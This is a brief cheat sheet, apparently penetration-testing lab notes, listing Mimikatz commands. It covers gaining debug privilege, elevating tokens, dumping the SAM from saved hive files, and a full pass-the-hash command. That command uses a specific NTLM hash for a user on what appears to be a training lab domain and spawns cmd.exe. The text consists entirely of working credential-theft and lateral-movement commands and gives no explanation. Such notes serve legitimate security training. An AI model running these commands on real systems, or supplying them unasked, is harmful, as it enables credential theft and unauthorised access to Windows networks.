Mimikatz

“privilege::debug” and then “token::elevate

 

lsadump::sam filename1.hiv filename2.hiv

mimikatz.exe privilege::debug “sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe” exit